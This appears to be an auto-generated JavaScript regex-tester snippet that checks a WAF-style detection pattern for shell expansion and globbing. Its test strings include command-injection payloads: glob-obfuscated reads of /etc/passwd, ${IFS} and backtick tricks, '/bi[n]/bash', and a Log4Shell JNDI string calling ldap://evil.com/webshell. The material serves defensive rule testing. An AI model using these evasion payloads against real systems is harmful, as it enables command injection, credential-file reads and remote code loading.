const regex = new RegExp('\\$(?:\\((?:[^\\(\\)]*|\\([^\\(\\)]*\\))\\)|\\{[^\\{\\}]*\\}|\\[[^\\[\\]]*\\])|[<>]\\([^\\(\\)]*\\)|(?:/[0-9A-Z_a-z]*\\[!?[^/\\]]+|\\[[0-9A-Z_a-z]/+)\\]', 'gm')
const str = `/get?932130-1=\$(cmd)
932130-2=\${cmd}
931120-3=<(cmd)
>(cmd)=931120-4
{"foo": "\${:1337:-x\$}{jndi:ldap://evil.com/webshell}"}
var=0.84622338492032948\`echo\${IFS}crs312\`\`echo\${IFS}34test\`
cat /etc/pa[s]swd
cat /[?]tc/pa[?]swd
/get?s=/etc/pas[s]wd"
/get?s=/etc/[!q]asswd
/get?s=/etc/[m-z]asswd
/get?s=/usr/bin/[u]name+-a
/get?exec=/bi[n]/bash
/get?932130-17=\$([])
echo \$(echo \$(cat /etc/passwd))
echo \${asd}
cat /etc/[p//]asswd
cat /[e//]tc/[p//]asswd
cat /[e/////////]tc/[p//]asswd
ls a[b///]c
ls *[a//]c
# should not match
932130-5=Some text (in brackets).
hello [text in brackets]
take this math expression: 1/[a/-1]
plase calculate the following a/[b/1234*c]
`;
// Reset `lastIndex` if this regex is defined globally
// regex.lastIndex = 0;
let m;
while ((m = regex.exec(str)) !== null) {
// This is necessary to avoid infinite loops with zero-width matches
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
// The result can be accessed through the `m`-variable.
m.forEach((match, groupIndex) => {
console.log(`Found match, group ${groupIndex}: ${match}`);
});
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for JavaScript, please visit: https://developer.mozilla.org/en/docs/Web/JavaScript/Guide/Regular_Expressions